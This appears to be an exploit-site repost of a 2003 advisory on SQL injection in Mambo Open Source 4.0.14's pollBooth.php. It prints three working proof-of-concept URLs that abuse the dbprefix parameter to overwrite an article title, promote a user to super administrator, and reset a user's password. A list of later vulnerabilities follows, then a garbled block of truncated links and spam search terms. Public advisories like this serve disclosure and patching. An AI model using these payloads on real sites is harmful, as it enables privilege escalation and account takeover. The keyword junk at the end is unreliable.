exploits , vulnerabilities , articles , Mambo Open Source PollBooth.PHP Multiple SQL Injection Vulnerabilities

Title	Mambo Open Source PollBooth.PHP Multiple SQL Injection Vulnerabilities
Published	2003-12-10-12:00AM
Updated	2003-12-10-11:18PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery of these vulnerabilities has been credited to frog-m@n <frog-man@security-corporation.com>.
Vulnerable	Mambo Mambo Open Source 4.0.14
Not Vulnerable
Code	The following proof of concept exploit have been supplied: # The title of the article N?23 becomes "hop" : http://www.example.com/pollBooth.php?task=Vote&lang=eng&sessioncookie=1& voteID=1&dbprefix=mos_articles%20SET%20title=char(104,111,112) %20WHERE artid=23/* # The user having id 52 becomes "super administrator" : http://www.example.com/pollBooth.php?task=Vote&lang=eng&sessioncookie=1& voteID=1&dbprefix=mos_users%20SET%20usertype=char(115,117, 112,101,114,97,100,109,105,110,105,115,116,114,97,116,111,114) %20WHERE%20id=52/* # The password of the user having id 10 becomes 'a' : http://www.example.com/pollBooth.php?task=Vote&lang=eng&sessioncookie=1& voteID=1&dbprefix=mos_users%20SET%20password=md5(char(97)) %20WHERE%20id=10/*
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
2009-12-16 Horde Application Framework Administration Interface Cross-Site Scripting Vulnerability
2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 23:00:00 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Crack+Data 2...n.com/ 2...n.com/ 2...n.com/ 2...n.com/ 0dy johnnyjeta 2...n.com/ news for c Video fone weman six news for C www.gamer. WWW.SANTA 2...n.com/ 2...n.com/ WWWThreads phpMyVisit Donkysex www.j131.c Asia sex 2...n.com/ 2...n.com/ morewisema 2...n.com/ jogos+de+s WWW.SEX SE 2...n.com/ cowsex www.avisoo 2...n.com/ www.sexyfu www.showpi PHP HTML ww.cowlist 2...n.com/ 2...n.com/ www.lexsen AllMyGuest 2...n.com/ Sex+dibali admin/adde EXPLOITER 2...n.com/ wallp security d xam Nude pictu WWW.SEX SE 2...n.com/